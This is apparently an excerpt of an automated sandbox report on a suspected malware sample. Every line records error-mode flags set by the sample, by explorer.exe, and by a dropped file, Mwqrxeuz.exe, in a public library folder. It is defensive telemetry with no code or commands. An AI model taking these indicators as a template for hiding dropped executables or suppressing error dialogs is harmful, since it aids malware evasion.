          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
